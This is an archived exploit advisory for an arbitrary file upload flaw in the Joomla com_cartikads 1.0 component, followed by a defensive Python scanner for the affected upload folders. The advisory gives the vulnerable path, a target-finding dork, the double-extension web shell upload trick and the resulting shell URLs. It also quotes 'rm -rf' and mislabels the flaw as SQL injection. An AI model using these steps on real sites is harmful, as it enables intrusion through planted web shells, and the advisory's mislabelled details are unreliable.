Joomla! Component com_cartikads 1.0 – Arbitrary File Upload

  • Author: kaMtiEz
    Date: 2010-01-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/10984/
  • ###################################################################################
    #
    [~] Joomla components com_cartikads Remote File Upload vulnerability #
    [~] Author	: kaMtiEz (kamzcrew@yahoo.com)#
    [~] Homepage	: http://www.indonesiancoder.com#
    [~] Date	: January 02, 2009#
    #
    ###################################################################################
    
    [ Software Information ]
    
    [+] Vendor : http://www.cartikahosting.com
    [+] Download : -
    [+] version : 1.0
    [+] Vulnerability : SQL injection
    [+] Dork : "Think iT"
    [+] Price : dunno
    [+] Location : INDONESIA - JOGJA
    [+] description : Cartikads is a Mambo Open Source ads management component.
    
    ##################################################################################
    
    
    [ HERE WE GO .. LIVE FROM JOGJA CITY ]
    
    [ Vulnerable File ]
    
    http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php
    
    [ NOTE ]
    
    upload with extension shell.php.jpg
    
    your shell will be
    
    http://server/[kaMtiEz]/images/stories/shell.php.jpg
    
    http://server/[kaMtiEz]/images/banners/shell.php.jpg
    
    
    ===========================================================================
    
    [ Thx TO ]
    [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
    [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
    [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
    [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
    
    [ NOTE ] 
    
    [+] My mom and dad .. and not forgetting my little sibling ..
    [+] tukulesto : where did u go ??
    [+] Listen to the radio at http://antisecradio.fm :D
    
    [ QUOTE ]
    
    [+] rm -rf 
    
    [ EOF ]
    
    [+] INDONESIANOCODER TEAM
    [+] KILL -9 TEAM
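
For defenders, a sweep of the two upload directories named in the advisory (`images/stories`, `images/banners`) for files shaped like the `shell.php.jpg` case. This is an added example, not part of the original advisory; the extension list, the `<?php` content check, the function names and the sample files are assumptions constructed for illustration.

```python
import os
import tempfile

# Assumption: extensions a permissive web-server handler mapping may execute.
EXEC_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Upload directories named in the advisory, relative to the Joomla root.
UPLOAD_DIRS = ("images/stories", "images/banners")

def is_suspicious_name(filename):
    """True if ANY extension segment, not only the last, is executable."""
    parts = filename.lower().split(".")[1:]
    return any(p in EXEC_EXT for p in parts)

def has_php_tag(path, limit=65536):
    """True if the first `limit` bytes contain a PHP open tag."""
    with open(path, "rb") as fh:
        return b"<?php" in fh.read(limit).lower()

def scan(joomla_root):
    """Return sorted (relative_path, reasons) for files worth reviewing."""
    findings = []
    for rel in UPLOAD_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(joomla_root, rel)):
            for name in files:
                full = os.path.join(dirpath, name)
                checks = {"executable-extension": is_suspicious_name(name),
                          "php-open-tag": has_php_tag(full)}
                reasons = [k for k, hit in checks.items() if hit]
                if reasons:
                    rel_path = os.path.relpath(full, joomla_root)
                    findings.append((rel_path.replace(os.sep, "/"), reasons))
    return sorted(findings)

def demo():
    """Build a constructed web root (sample files only) and scan it."""
    root = tempfile.mkdtemp()
    samples = {
        "images/stories/logo.jpg": b"\xff\xd8\xff\xe0JFIF",
        "images/stories/shell.php.jpg": b"<?php /* constructed sample */ ?>",
        "images/banners/ad.gif": b"GIF89a<?php /* constructed sample */ ?>",
    }
    for rel, data in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return scan(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Checking every extension segment matters because a filter that only inspects the final `.jpg` passes the double-extension name; the content check additionally catches script code placed behind a valid image header.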